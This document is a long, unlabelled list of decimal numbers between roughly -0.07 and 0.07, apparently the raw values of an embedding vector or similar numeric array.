0.007400105707347393, -0.019166136160492897, -0.01266530156135559, 0.020360587164759636, -0.0036588648799806833, -0.0008713830611668527, 0.016461459919810295, -0.025097204372286797, 0.0017933929339051247, 0.010173428803682327, -0.02449311502277851, 0.000026104486096301116, 0.059036094695329666, -0.009219241328537464, 0.008869143202900887, -0.0019375508418306708, 0.029710257425904274, -0.020291941240429878, 0.014038234017789364, -0.043247371912002563, -0.042615823447704315, 0.01548667810857296, -0.024259716272354126, -0.015335654839873314, 0.02883158065378666, -0.014800211414694786, 0.008869143202900887, -0.04497726634144783, -0.006030605640262365, -0.029325837269425392, 0.032318830490112305, -0.014086286537349224, 0.02011346071958542, 0.0054951622150838375, -0.0007782810716889799, -0.01808151975274086, 0.020374316722154617, 0.05066120624542236, 0.03814006224274635, -0.0010331316152587533, 0.020992137491703033, -0.0034872484393417835, 0.01640654169023037, -0.009933166205883026, 0.020662633702158928, -0.01192391850054264, -0.012081805616617203, 0.026552513241767883, 0.017779475077986717, 0.01864442229270935, -0.025811130180954933, -0.0025570865254849195, -0.0011086429003626108, -0.0024661298375576735, -0.015404301695525646, 0.040940843522548676, -0.021252993494272232, -0.010544121265411377, -0.0350646935403347, 0.006562617141753435, -0.012274015694856644, 0.026374032720923424, -0.002170949475839734, 0.0015042191371321678, 0.015335654839873314, -0.007255947683006525, 0.010036136023700237, 0.01696944423019886, -0.0022464606445282698, 0.00885541457682848, -0.008670068345963955, -0.0020593986846506596, 0.019619204103946686, 0.013049722649157047, 0.00891033187508583, -0.004482624586671591, 0.026030799373984337, 0.015431760810315609, -0.007043143268674612, -0.011772895231842995, 0.007255947683006525, 0.006445917766541243, -0.06529666483402252, -0.02338103950023651, 0.01558278314769268, 0.0018792012706398964, 0.015006151050329208, -0.004945989232510328, -0.0025862613692879677, 0.010139105841517448, -0.0007731325458735228, -0.018205083906650543, -0.010969730094075203, -0.013660677708685398, 0.041215430945158005, -0.00451694754883647, 0.000208406854653731, 0.0013935264432802796, 0.020923489704728127, -0.028584452345967293, 0.01993497833609581, 0.002601706888526678, -0.000986795173957944, -0.014717835932970047, 0.008683797903358936, 0.03300529718399048, -0.01631043665111065, -0.0019255377119407058, 0.006878391373902559, 0.0035284364130347967, 0.01506106834858656, 0.0022722030989825726, 0.02011346071958542, -0.013605760410428047, -0.015692617744207382, 0.022131670266389847, 0.003363684518262744, -0.03764580562710762, -0.024918723851442337, -0.005021500401198864, 0.0024541167076677084, 0.014127474278211594, 0.007585451472550631, 0.030067220330238342, 0.015459218993782997, 0.025165852159261703, 0.009390858002007008, 0.0007508224225603044, 0.01010478287935257, -0.0018260001670569181, -0.001609763246960938, 0.012761406600475311, -0.022955430671572685, -0.016104497015476227, 0.021994376555085182, -0.04898623004555702, 0.005968823563307524, 0.003631406230852008, 0.013784241862595081, 0.029655341058969498, -0.007132383994758129, -0.00024155029677785933, -0.010599038563668728, -0.01149830874055624, -0.016845880076289177, 0.041215430945158005, 0.026689806953072548, -0.021912001073360443, -0.016392813995480537, 0.012219098396599293, 0.015445489436388016, -0.03349955007433891, -0.03163236379623413, -0.001669829012826085, -0.017752015963196754, -0.004304143134504557, -0.036849506199359894, -0.018150167539715767, -0.01595347560942173, 0.0015986082144081593, -0.023161370307207108, 0.009981218725442886, 0.01558278314769268, 0.03846956789493561, -0.02894141525030136, 0.005508891306817532, -0.00009567623055772856, 0.018973926082253456, 0.0022893648128956556, -0.0095075573772192, 0.04159985110163689, 0.05340707302093506, -0.015692617744207382, -0.026744723320007324, -0.02095094881951809, -0.006397865246981382, -0.02734881453216076, 0.0033774138428270817, 0.024355821311473846, -0.00950069259852171, -0.039183489978313446, -0.041215430945158005, 0.050771042704582214, 0.02836478315293789, 0.019619204103946686, -0.019729038700461388, 0.021637415513396263, 0.005711399018764496, -0.009658579714596272, -0.03753597289323807, 0.042698197066783905, 0.017010632902383804, -0.013550843112170696, 0.013392955996096134, 0.022831866517663002, -0.02169233188033104, -0.0022395960986614227, -0.0007516805198974907, -0.025536542758345604, 0.006651857402175665, 0.003447776660323143, 0.01195824146270752, -0.005086714401841164, -0.024218527600169182, 0.040858469903469086, -0.0312479417771101, 0.0034820998553186655, 0.01215045154094696, -0.006528293713927269, -0.011045241728425026, 0.000006076968929846771, -0.0039059927221387625, -0.008635745383799076, -0.011512038297951221, -0.038799069821834564, 0.004633646924048662, 0.008848549798130989, 0.006391000468283892, -0.002196691930294037, 0.023683084174990654, -0.003957477863878012, 0.0030410452745854855, -0.020703820511698723, -0.022104211151599884, -0.020003626123070717, 0.018699340522289276, -0.038716692477464676, 0.007777662016451359, -0.002896887483075261, -0.025426708161830902, -0.008525910787284374, 0.0010108215501531959, -0.02401258796453476, -0.0031062595080584288, -0.001252800808288157, -0.022378798574209213, -0.03498231992125511, -0.06430815160274506, 0.015884827822446823, 0.014305955730378628, 0.0013334605609998107, -0.025577731430530548, 0.020195836201310158, 0.01427849754691124, -0.007221624720841646, -0.017079278826713562, -0.0069230119697749615, 0.008525910787284374, -0.02910616807639599, -0.005000906530767679, 0.009473233483731747, -0.0017479145899415016, 0.014896316453814507, 0.012637843377888203, 0.0031920678447932005, -0.0054951622150838375, 0.03300529718399048, -0.02467159554362297, 0.007262812461704016, -0.01872679777443409, 0.008127760142087936, 0.0190151147544384, -0.018781716004014015, 0.020154647529125214, 0.0007246509194374084, 0.011470850557088852, 0.013276256620883942, -0.010393097996711731, -0.02328493446111679, -0.0018139869207516313, 0.03105573169887066, -0.025454167276620865, -0.0008666635840199888, -0.019344618543982506, 0.010379369370639324, -0.0015179484616965055, 0.014429519884288311, 0.001645802753046155, -0.0023322689812630415, 0.016269249841570854, 0.00030011445051059127, -0.011944511905312538, 0.02133536897599697, 0.00096791738178581, 0.025371791794896126, -0.00253992504440248, -0.03163236379623413, 0.0033568197395652533, 0.0023871862795203924, -0.025618918240070343, 0.017669640481472015, 0.01566515862941742, 0.041490018367767334, 0.021458933129906654, -0.01864442229270935, 0.010509797371923923, -0.043164994567632675, 0.04769567400217056, -0.020237023010849953, -0.01566515862941742, 0.0029603855218738317, -0.008972113020718098, -0.028172573074698448, 0.005282357335090637, 0.009816466830670834, -0.0014235592680051923, 0.02736254408955574, -0.012548602186143398, -0.026730993762612343, -0.011553226038813591, 0.009528150781989098, -0.008210135623812675, -0.011072699911892414, -0.02301034703850746, -0.008079707622528076, 0.023435955867171288, -0.03089097887277603, -0.016763504594564438, -0.004187443759292364, -0.032675791531801224, -0.008690662682056427, 0.03748105466365814, -0.01024207565933466, 0.013880346901714802, 0.015335654839873314, 0.009562474675476551, 0.0045581357553601265, 0.01992124877870083, 0.025632647797465324, -0.029929926618933678, -0.0017015781486406922, -0.0144569780677557, 0.007509940303862095, -0.0026669211219996214, -0.015267008915543556, -0.014635459519922733, -0.023230016231536865, -0.029545506462454796, -0.005512323696166277, -0.008731850422918797, 0.000037380228604888543, 0.01447070762515068, 0.002342565916478634, 0.004565000534057617, -0.012246557511389256, -0.025920964777469635, -0.012328932993113995, 0.018218813464045525, 0.0011995997047051787, 0.01883663237094879, 0.0005538924015127122, -0.008402346633374691, -0.042698197066783905, 0.04970015212893486, -0.002136626048013568, -0.005237737204879522, -0.0009310197783634067, -0.010585309006273746, 0.021939460188150406, -0.021994376555085182, -0.027019310742616653, 0.0019495640881359577, 0.0003157744649797678, 0.003624541684985161, 0.01088735368102789, 0.02688201703131199, 0.01506106834858656, 0.015610241331160069, 0.008134624920785427, 0.011463985778391361, -0.00574915437027812, -0.019811414182186127, -0.008196406997740269, 0.009143729694187641, 0.048464514315128326, -0.010509797371923923, -0.006874958984553814, -0.007434429135173559, 0.029078708961606026, 0.01669485867023468, 0.0031062595080584288, -0.006809744983911514, 0.0006984793581068516, -0.007544263731688261, -0.013791106641292572, -0.011189399287104607, 0.03693188354372978, 0.007757068146020174, -0.031220482662320137, -0.01335863210260868, -0.011992564424872398, -0.01005673035979271, -0.0012159033212810755, 0.02744491957128048, 0.001221909886226058, 0.01441579032689333, 0.0011687087826430798, 0.0031920678447932005, -0.006799447815865278, -0.0318794921040535, 0.0059859855100512505, -0.00655918475240469, -0.017559805884957314, 0.005182819906622171, 0.008965249173343182, 0.01661248318850994, -0.04407113045454025, -0.025481626391410828, 0.03382905572652817, 0.026483867317438126, -0.01975649781525135, -0.027280166745185852, -0.006061496678739786, -0.02410869300365448, 0.0010056729661300778, -0.018136437982320786, 0.016722317785024643, 0.006507699843496084, 0.01251427922397852, 0.0029449400026351213, 0.029435671865940094, -0.003799590514972806, -0.009624255821108818, 0.02291424199938774, 0.02707422710955143, -0.025056017562747, -0.0013574869371950626, -0.03042418323457241, -0.023971399292349815, 0.01191705372184515, -0.026936933398246765, 0.017491159960627556, 0.010008676908910275, 0.021472662687301636, 0.007098060566931963, 0.011024647392332554, -0.0024918722920119762, 0.017298948019742966, -0.009864519350230694, -0.0400347076356411, -0.04198427498340607, 0.03154998645186424, 0.019976167008280754, -0.005364733282476664, -0.00424579344689846, 0.013880346901714802, 0.006919579580426216, 0.006641560699790716, 0.020237023010849953, -0.004256090614944696, -0.005536349955946207, 0.036108121275901794, -0.03682204708456993, -0.029325837269425392, 0.02644267864525318, 0.005309815984219313, 0.015720076858997345, 0.001015970017760992, 0.02215912938117981, 0.006109549198299646, 0.0156788881868124, -0.03023197129368782, -0.009926301427185535, -0.028447160497307777, -0.04239615425467491, 0.004180579446256161, 0.01381856482475996, -0.01948191039264202, -0.011615008115768433, 0.02828240767121315, -0.017271490767598152, -0.0009687754209153354, 0.0009533299598842859, -0.002855699509382248, 0.007976737804710865, 0.009953759610652924, -0.026099445298314095, -0.01317328680306673, -0.011333556845784187, 0.020003626123070717, -0.03533928096294403, -0.020182106643915176, -0.026181820780038834, -0.029051249846816063, 0.0006950470269657671, 0.019358346238732338, -0.0032710114028304815, 0.0132144745439291, 0.004565000534057617, 0.052089057862758636, 0.01441579032689333, -0.009157459251582623, -0.01826000213623047, 0.005467703565955162, -0.035284362733364105, 0.017546076327562332, 0.04750346019864082, -0.006284598261117935, 0.014772753231227398, -0.01845221221446991, 0.007413835264742374, -0.001303427736274898, -0.02762340009212494, -0.011656195856630802, 0.006349812261760235, -0.012953617610037327, 0.014100016094744205, -0.03995233401656151, -0.00834742933511734, 0.008045383729040623, -0.014896316453814507, -0.02863937057554722, -0.0090819476172328, -0.0030118704307824373, -0.04560881480574608, 0.025536542758345604, 0.012775136157870293, -0.009871384128928185, 0.012912429869174957, 0.031852032989263535, -0.0029741148464381695, 0.028584452345967293, -0.012219098396599293, 0.0067239366471767426, -0.001832864829339087, -0.010461744852364063, 0.015445489436388016, 0.026868287473917007, 0.024987369775772095, 0.013523383997380733, 0.017024362459778786, 0.014896316453814507, 0.014168662950396538, 0.027033040300011635, -0.017957955598831177, -0.009226106107234955, -0.01511598564684391, -0.005635887384414673, 0.0035112746991217136, 0.014964963309466839, -0.013365496881306171, -0.0012845499441027641, 0.019866332411766052, 0.00021698768250644207, 0.001461314968764782, -0.009308481588959694, 0.0012630978599190712, 0.017134197056293488, -0.01642027124762535, 0.00445173354819417, 0.018493399024009705, -0.007152977865189314, -0.043741628527641296, 0.006771989166736603, 0.03503723442554474, -0.02123926393687725, -0.006916147191077471, -0.0003185632231179625, -0.008958384394645691, 0.009232970885932446, 0.0010768938809633255, -0.019083760678768158, 0.028049008920788765, -0.019124949350953102, 0.014024504460394382, -0.009301616810262203, 0.027513565495610237, -0.023998858407139778, -0.008059113286435604, -0.007084331475198269, 0.004767507780343294, -0.02235133945941925, -0.006095820106565952, 0.007352053187787533, -0.021307911723852158, 0.0013377510476857424, 0.0018706204136833549, -0.045746106654405594, -0.0028230922762304544, 0.00389569578692317, -0.0064218915067613125, 0.001149830874055624, 0.007317729759961367, 0.002136626048013568, 0.015033610165119171, 0.015898557379841805, -0.01511598564684391, -0.022214045748114586, 0.013489061035215855, -0.01390780508518219, 0.004208038095384836, 0.00025077469763346016, -0.01015970017760992, -0.015926016494631767, -0.00825132429599762, -0.023532060906291008, -0.006960767321288586, 0.009885113686323166, -0.04354941472411156, 0.013063452206552029, -0.004925394896417856, -0.011113887652754784, -0.0019083761144429445, -0.011766030453145504, -0.011512038297951221, -0.02067636139690876, -0.0018036899855360389, -0.014896316453814507, -0.0027424325235188007, -0.007674692198634148, 0.0290237907320261, 0.07128265500068665, 0.005608428735285997, -0.01427849754691124, -0.006727369036525488, -0.010605903342366219, -0.00574915437027812, 0.009239835664629936, -0.023586979135870934, 0.006971064489334822, 0.005941364914178848, 0.017216572538018227, -0.0035318685695528984, 0.006013444159179926, 0.007406970486044884, 0.017669640481472015, 0.005944797303527594, 0.016900798305869102, 0.002467846032232046, 0.004286981653422117, -0.01501988060772419, 0.011024647392332554, 0.005944797303527594, -0.0013926683459430933, -0.017642181366682053, 0.02048415131866932, -0.024685325101017952, 0.006071793846786022, -0.00788063183426857, -0.03347209095954895, -0.0190151147544384, 0.011052105575799942, 0.013029128313064575, -0.018575776368379593, 0.004743481520563364, 0.002249893033877015, 0.013015399686992168, 0.0298750102519989, -0.0006714497576467693, -0.01307718176394701, 0.0019426994258537889, 0.002255041617900133, -0.009150594472885132, 0.0013652096968144178, -0.011992564424872398, -0.008731850422918797, -0.022035565227270126, 0.01431968528777361, -0.007207895163446665, -0.0036279738415032625, 0.011903324164450169, 0.0011361015494912863, -0.015376843512058258, 0.03201678395271301, 0.02715660259127617, -0.005371598061174154, 0.008930925279855728, -0.005862421356141567, -0.02567383646965027, -0.016282979398965836, -0.0013883778592571616, -0.0027973498217761517, 0.023902753368020058, -0.009713497012853622, 0.005302951671183109, 0.0022430282551795244, 0.002220718190073967, -0.012109263800084591, 0.016282979398965836, -0.019866332411766052, 0.014196121133863926, -0.008841685019433498, 0.013619489967823029, 0.000026627380066202022, 0.007207895163446665, 0.0008083139546215534, 0.015637699514627457, -0.0025073178112506866, 0.028227491304278374, -0.014223580248653889, -0.014113745652139187, 0.02810392715036869, 0.04514201730489731, -0.02254354953765869, 0.021870814263820648, -0.004242361057549715, 0.03141269460320473, -0.003485532244667411, -0.014031369239091873, 0.01853458769619465, 0.005601564422249794, -0.02177470736205578, -0.002896887483075261, 0.023133911192417145, 0.008079707622528076, 0.03421347588300705, 0.023065265268087387, 0.023394769057631493, -0.0009601946221664548, -0.011333556845784187, -0.010365639813244343, -0.0021675170864909887, -0.010276399552822113, 0.01975649781525135, -0.006020308472216129, -0.016461459919810295, 0.00623311335220933, -0.0052068461664021015, 0.028447160497307777, -0.0019375508418306708, -0.005790342576801777, -0.04272565618157387, -0.03242866322398186, 0.029627881944179535, -0.03643762692809105, -0.009493827819824219, 0.010537256486713886, 0.006960767321288586, -0.013022264465689659, -0.028035279363393784, -0.00787376705557108, -0.02393021248281002, -0.02059398591518402, 0.02910616807639599, -0.011752301827073097, -0.0003816323005594313, 0.032868001610040665, -0.007386376615613699, -0.03289546072483063, 0.05052391439676285, 0.014745294116437435, 0.03289546072483063, -0.005622158292680979, 0.01911121979355812, -0.028419701382517815, -0.007152977865189314, -0.034735191613435745, 0.012438767589628696, -0.0006873242673464119, -0.01956428773701191, 0.0055741057731211185, -0.003447776660323143, 0.03429585322737694, 0.012026888318359852, -0.008546504192054272, 0.007736474275588989, -0.008601421490311623, -0.0031749061308801174, 0.008834820240736008, 0.009727226570248604, -0.0013986749108880758, -0.0036760265938937664, -0.02847461774945259, 0.008519046008586884, 0.015651429072022438, 0.005433380138128996, 0.0017522049602121115, 0.020607715472579002, -0.024136152118444443, -0.0034529250115156174, -0.005316680762916803, 0.00393688352778554, 0.0031920678447932005, 0.003337942063808441, 0.001648377045057714, -0.0066243987530469894, 0.02206302434206009, 0.019783956930041313, -0.0518968440592289, -0.020154647529125214, -0.01964666321873665, 0.014292226172983646, 0.009768414311110973, -0.025454167276620865, 0.017038092017173767, 0.008368022739887238, 0.011978835798799992, -0.003135434351861477, 0.012624113820493221, 0.00842980481684208, -0.015335654839873314, 0.009432045742869377, 0.03597082942724228, 0.02533060312271118, 0.0006208228878676891, 0.008738715201616287, -0.025083474814891815, -0.015555324032902718, 0.013379226438701153, -0.027142874896526337, 0.011347286403179169, -0.0030050058849155903, 0.036108121275901794, -0.014388332143425941, -0.02995738573372364, -0.01501988060772419, -0.010702008381485939, 0.00753053417429328, -0.003358535934239626, -0.008402346633374691, -0.0011721410555765033, 0.01029699295759201, -0.026758452877402306, 0.00024069221399258822, -0.0015557040460407734, -0.02235133945941925, -0.027101686224341393, 0.014113745652139187, 0.03069876879453659, -0.016269249841570854, 0.004142823629081249, 0.012500549666583538, 0.0229828879237175, 0.0024661298375576735, 0.010859895497560501, -0.007400105707347393, 0.007654098328202963, -0.021912001073360443, -0.021101972088217735, -0.014100016094744205, -0.004177147056907415, -0.007942413911223412, 0.008848549798130989, 0.010132241062819958, -0.004757210612297058, -0.0240949634462595, 0.0021932595409452915, 0.02995738573372364, -0.013640083372592926, -0.0010811842512339354, 0.0289139561355114, -0.01261038426309824, 0.01441579032689333, -0.005780045408755541, 0.011731707490980625, 0.007290271110832691, -0.02447938546538353, 0.008628880605101585, 0.03144015371799469, -0.006401297636330128, -0.010448015294969082, 0.008573963306844234, 0.012637843377888203, -0.007866903208196163, -0.010592173784971237, 0.004091338720172644, -0.0001690423086984083, 0.03069876879453659, -0.008148353546857834, -0.011827812530100346, 0.03311512991786003, -0.02910616807639599, -0.02170606143772602, -0.003995233215391636, -0.005364733282476664, 0.005186252295970917, 0.012116128578782082, -0.007860038429498672, 0.0204978808760643, 0.023243745788931847, 0.000018609669496072456, 0.01614568568766117, -0.0019821710884571075, -0.01685960963368416, 0.017971685156226158, -0.015390572138130665, 0.003035896923393011, 0.006497402675449848, -0.00345464120618999, 0.01751861721277237, 0.003648567944765091, -0.011848406866192818, 0.009027030318975449, 0.015720076858997345, -0.03503723442554474, 0.0033671166747808456, -0.014992422424256802, 0.0003423750167712569, 0.004317872691899538, 0.0005483148852363229, -0.0024112125393003225, 0.011278639547526836, 0.05464271083474159, 0.01845221221446991, -0.02874920517206192, -0.005155361257493496, -0.006552319973707199, -0.029627881944179535, -0.00414968840777874, -0.014209850691258907, 0.00004427170642884448, 0.0004822425253223628, 0.00835429411381483, -0.0049940417520701885, -0.036767128854990005, 0.01316642202436924, 0.00110692682210356, -0.0039918008260428905, 0.005364733282476664, -0.023724272847175598, -0.014182391576468945, 0.01075692567974329, 0.05274806544184685, 0.0008443534607067704, 0.006219383794814348, -0.014827670529484749, 0.013990181498229504, -0.006456214934587479, 0.008319970220327377, -0.007688421756029129, -0.009967489168047905, -0.015212091617286205, -0.012315203435719013, 0.0014939220855012536, -0.022035565227270126, 0.017381325364112854, -0.012486820109188557, 0.010379369370639324, 0.005282357335090637, -0.023133911192417145, -0.008546504192054272, -0.0051965489983558655, -0.024520572274923325, -0.03896382078528404, -0.016914527863264084, -0.021568767726421356, 0.0006710207089781761, -0.00449978606775403, 0.004918530583381653, 0.01269962452352047, -0.01256919652223587, 0.009679173119366169, 0.015363113954663277, 0.020539069548249245, -0.0044757598079741, 0.0003464509209152311, -0.009871384128928185, 0.007304000668227673, 0.011731707490980625, -0.018479671329259872, -0.022474903613328934, -0.018589505925774574, 0.012081805616617203, -0.012500549666583538, 0.008622015826404095, 0.0018792012706398964, -0.0041359588503837585, -0.011477715335786343, 0.0004865329246968031, -0.003207513364031911, -0.02855699509382248, -0.02122553437948227, -0.01946818083524704, -0.0226121973246336, 0.004575297236442566, 0.0022893648128956556, 0.019989896565675735, 0.009919436648488045, 0.009816466830670834, 0.01670858822762966, -0.037508513778448105, 0.006487105507403612, 0.014868858270347118, -0.021198077127337456, 0.0005041236290708184, 0.0017015781486406922, -0.006785718724131584, -0.01085303071886301, 0.013983316719532013, 0.0061987899243831635, -0.004695429001003504, -0.0020799925550818443, 0.037041716277599335, 0.012576061300933361, -0.006119846366345882, -0.012335797771811485, 0.002982695586979389, 0.02671726420521736, -0.02077246829867363, -0.027980362996459007, 0.01094913575798273, 0.01136101596057415, -0.007983601652085781, -0.0004895362071692944, -0.00004354770135250874, -0.016008391976356506, 0.014676647260785103, -0.016736045479774475, -0.01015970017760992, -0.018314918503165245, 0.016008391976356506, 0.0009172904537990689, 0.033142589032649994, 0.022474903613328934, 0.03912857547402382, 0.02938075363636017, 0.0008829671423882246, 0.016282979398965836, 0.007805120665580034, 0.004616485442966223, -0.020250752568244934, 0.009020166471600533, -0.0037961581256240606, -0.004321304615586996, 0.017848121002316475, 0.020841114223003387, 0.0043350341729819775, -0.00011509034811751917, -0.02041550539433956, 0.03105573169887066, -0.0075717223808169365, 0.013413549400866032, -0.0024180773179978132, 0.016530105844140053, 0.004952853545546532, -0.0067685567773878574, 0.0028780095744878054, -0.024314632639288902, 0.008114030584692955, -0.02809019759297371, 0.000780855305492878, -0.0041908761486411095, 0.015267008915543556, -0.01372932456433773, -0.02791171707212925, 0.00006451709487009794, -0.015033610165119171, 0.006092387717217207, 0.002474710578098893, -0.006826906464993954, -0.03275816887617111, 0.0023442821111530066, 0.020511610433459282, -0.003655432490631938, -0.020099731162190437, 0.0052617634646594524, -0.014662918634712696, -0.03613558039069176, -0.0038510754238814116, -0.019440723583102226, 0.0005598990246653557, 0.02718406170606613, -0.007104925345629454, -0.0020542501006275415, 0.00890346709638834, -0.00486704520881176, 0.0006980503094382584, -0.015335654839873314, -0.015569053590297699, -0.004726320039480925, -0.005635887384414673, 0.013104639947414398, 0.004359060432761908, 0.0215001218020916, 0.010928542353212833, -0.019770227372646332, 0.0026291655376553535, -0.0028951712884008884, -0.0016114794416353106, -0.007400105707347393, -0.005234304815530777, 0.0039231544360518456, -0.009246699512004852, 0.028049008920788765, 0.008937790058553219, 0.0004951137816533446, 0.010365639813244343, -0.012088670395314693, 0.004448301158845425, -0.004743481520563364, -0.013338038697838783, 0.008024790324270725, 0.014010775834321976, -0.00039085670141503215, 0.0043453313410282135, -0.0016174860065802932, -0.0193858053535223, -0.008876007981598377, -0.01604958064854145, 0.004757210612297058, -0.0101940231397748, 0.010674549266695976, 0.003974639344960451, -0.005728560499846935, 0.004877342376857996, -0.013557707890868187, 0.010544121265411377, -0.01204748172312975, -0.0024232256691902876, 0.001236497308127582, 0.00667931605130434, 0.02243371494114399, -0.014484437182545662, 0.012122993357479572, 0.01975649781525135, -0.015129715204238892, 0.010825572535395622, 0.015706347301602364, 0.029518047347664833, 0.004709158092737198, 0.002970682457089424, -0.01386661734431982, -0.018932737410068512, 0.0015110837994143367, 0.006524861324578524, -0.011642467230558395, -0.005402489099651575, -0.013351768255233765, -0.006463079247623682, 0.01145025622099638, -0.01566515862941742, 0.0026102878618985415, -0.02373800240457058, 0.00212289672344923, -0.007695286069065332, 0.008889737538993359, 0.0015196645399555564, -0.022873053327202797, -0.017175383865833282, -0.021390287205576897, -0.007029414176940918, -0.018658151850104332, 0.007969873026013374, -0.004589026793837547, -0.010647091083228588, 0.01140906848013401, 0.008793632499873638, 0.014635459519922733, 0.002618868602439761, -0.011031512171030045, -0.007276542019098997, 0.010592173784971237, -0.001636363798752427, -0.008223865181207657, -0.0010262669529765844, -0.009205511771142483, 0.01391466986387968, 0.012376985512673855, -0.006953902542591095, -0.002692663809284568, -0.011278639547526836, 0.015733806416392326, -0.01381170004606247, 0.01669485867023468, 0.02031940035521984, 0.009075083769857883, -0.0015085095074027777, 0.0029277782887220383, 0.010118511505424976, 0.007098060566931963, 0.011333556845784187, 0.002026791451498866, -0.0012828337494283915, 0.00899957213550806, -0.0009593365248292685, -0.004005530383437872, -0.004698861390352249, -0.007578587159514427, 0.01631043665111065, -0.0042698197066783905, 0.0036520003341138363, -0.00044663206790573895, 0.0033654007129371166, 0.026456408202648163, 0.0013403252232819796, 0.012905565090477467, 0.02486380562186241, -0.005865853745490313, 0.008196406997740269, -0.004170282278209925, -0.008079707622528076, 0.0095075573772192, 0.0006178196053951979, 0.007159842643886805, 0.0014913477934896946, -0.01335863210260868, 0.010379369370639324, -0.0061438726261258125, -0.019221054390072823, 0.007386376615613699, -0.007434429135173559, 0.010550986044108868, 0.0037721318658441305, -0.02550908364355564, 0.014566812664270401, -0.005883015226572752, -0.028694286942481995, 0.016928257420659065, -0.023875294253230095, -0.03338971734046936, -0.01441579032689333, 0.021829625591635704, 0.014841399155557156, -0.02596215158700943, 0.012912429869174957, 0.004304143134504557, -0.02188454195857048, -0.010386234149336815, -0.022941701114177704, 0.014360873028635979, 0.010791248641908169, -0.00954874511808157, 0.012397579848766327, 0.016351625323295593, 0.0002808075805660337, 0.005924203433096409, 0.019028842449188232, 0.03514707088470459, 0.0011009201407432556, 0.009315346367657185, -0.010441151447594166, 0.002462697448208928, -0.004022691864520311, 0.0008065978181548417, 0.009981218725442886, 0.006638128310441971, -0.016008391976356506, 0.006782286334782839, 0.01441579032689333, -0.0025021692272275686, -0.03577861934900284, 0.007173571735620499, 0.021651145070791245, -0.038716692477464676, -0.004407112952321768, 0.011669925414025784, 0.0006980503094382584, 0.013660677708685398, -0.026044528931379318, 0.005251466296613216, -0.001965009607374668, 0.0036039475817233324, 0.020566526800394058, 0.0005084140575490892, 0.010413692332804203, -0.012397579848766327, 0.014951233752071857, -0.01548667810857296, 0.0034460604656487703, -0.012425038032233715, -0.014127474278211594, 0.0015196645399555564, -0.017010632902383804, -0.009898842312395573, -0.0036417031660676003, -0.013489061035215855, 0.01196510624140501, 0.015390572138130665, 0.000632406969089061, -0.014566812664270401, 0.011711113154888153, 0.010187158361077309, 0.0012459361460059881, 0.0008181818993762136, 0.003930019214749336, 0.004681699443608522, -0.01883663237094879, 0.006037470418959856, -0.004595891106873751, 0.003744673216715455, 0.004098203498870134, 0.03201678395271301, 0.01497869286686182, -0.012171045877039433, -0.0052171433344483376, 0.016173144802451134, 0.02152758091688156, -0.008917195722460747, -0.001348906080238521, 0.027005581185221672, 0.00414968840777874, -0.01917986571788788, -0.005292654503136873, 0.0001222767896251753, -0.010084188543260098, -0.023133911192417145, -0.014360873028635979, 0.006147305015474558, -0.007942413911223412, -0.021953189745545387, -0.0011747153475880623, 0.008031655102968216, -0.01377737708389759, 0.013379226438701153, -0.005296086892485619, -0.005179387517273426, -0.01836983673274517, 0.000005815521944896318, -0.008539639413356781, -0.006820041686296463, -0.011766030453145504, 0.01761472225189209, -0.0005109882913529873, 0.0156788881868124, 0.003837346099317074, 0.0029020358342677355, -0.02968279831111431, -0.020333129912614822, 0.012761406600475311, 0.016763504594564438, 0.015129715204238892, 0.010592173784971237, -0.02335358038544655, 0.012733948417007923, -0.004966583102941513, 0.01385975256562233, -0.002426658058539033, -0.0009258713107556105, -0.009988083504140377, 0.0022413122933357954, -0.0073589179664850235, 0.018685610964894295, -0.01621433161199093, -0.0022773516830056906, 0.0022361637093126774, 0.00343061494641006, 0.01316642202436924, -0.006514564156532288, -0.0057079666294157505, 0.03451552242040634, 0.007942413911223412, -0.016461459919810295, 0.0037481056060642004, 0.008889737538993359, -0.016008391976356506, -0.0030788008589297533, 0.01562397088855505, -0.026497595012187958, -0.023257475346326828, -0.016639940440654755, 0.007811985444277525, 0.01669485867023468, 0.02291424199938774, 0.02225523442029953, -0.00484301894903183, -0.00002544751623645425, -0.010454880073666573, -0.003253849921748042, -0.010008676908910275, -0.021170618012547493, -0.022090483456850052, 0.03734376281499863, 0.004698861390352249, -0.0027475811075419188, -0.0021692332811653614, 0.0009310197783634067, 0.009658579714596272, 0.0057869101874530315, 0.00665528979152441, -0.0290237907320261, 0.021115699782967567, 0.008937790058553219, 0.008848549798130989, -0.0193858053535223, 0.0032384044025093317, 0.004005530383437872, -0.0025382088497281075, -0.003984936513006687, -0.004589026793837547, -0.001082900445908308, -0.022598467767238617, 0.006301759742200375, -0.014553084038197994, 0.014223580248653889, 0.025811130180954933, -0.012287745252251625, 0.00037884354242123663, -0.0021932595409452915, -0.04772312939167023, -0.015006151050329208, -0.0052068461664021015, -0.0004921104409731925, 0.016104497015476227, 0.03338971734046936, -0.006428756285458803, -0.00538189522922039, 0.001025408855639398, 0.018122708424925804, -0.0156788881868124, 0.0017453402979299426, 0.004846451338380575, 0.027486106380820274, 0.005028365179896355, -0.005738857667893171, -0.0074275643564760685, 0.02863937057554722, -0.013482196256518364, -0.0036691618151962757, -0.0014381466899067163, 0.00003984721843153238, -0.017038092017173767, -0.0020611148793250322, -0.009713497012853622, -0.013990181498229504, 0.008731850422918797, 0.0025450733955949545, -0.013084045611321926, -0.013509655371308327, 0.008738715201616287, 0.011553226038813591, -0.009679173119366169, -0.00002642626714077778, -0.03273070976138115, -0.015926016494631767, 0.001118939951993525, 0.00844353437423706, 0.009624255821108818, -0.004311007913202047, -0.008244459517300129, 0.01269962452352047, -0.011601278558373451, -0.019536828622221947, 0.005797207355499268, -0.03693188354372978, -0.003132002195343375, 0.005361300893127918, 0.011477715335786343, -0.022406257688999176, 0.020470421761274338, 0.01853458769619465, -0.006840636022388935, 0.0004492063308134675, 0.007914955727756023, -0.01367440726608038, -0.02866682969033718, -0.015898557379841805, -0.019152406603097916, 0.02133536897599697, -0.0026549079921096563, 0.010125376284122467, -0.0016895650187507272, -0.011656195856630802, -0.00412566214799881, -0.010653955861926079, -0.03413109853863716, -0.02568756602704525, -0.008718120865523815, 0.005622158292680979, -0.01090108323842287, -0.02104705385863781, 0.03303275257349014, -0.006260572001338005, -0.007468752562999725, 0.022323880344629288, 0.0009584784274920821, -0.0005744863883592188, -0.014525624923408031, 0.00020894315093755722, -0.008827955462038517, -0.007818849757313728, -0.024067506194114685, -0.0029792634304612875, 0.017230302095413208, 0.0032813085708767176, 0.013386091217398643, 0.029051249846816063, -0.002402631798759103, 0.012871241196990013, -0.0276508592069149, -0.011388474144041538, -0.009857654571533203, -0.011512038297951221, 0.006552319973707199, 0.04451046884059906, -0.029133625328540802, 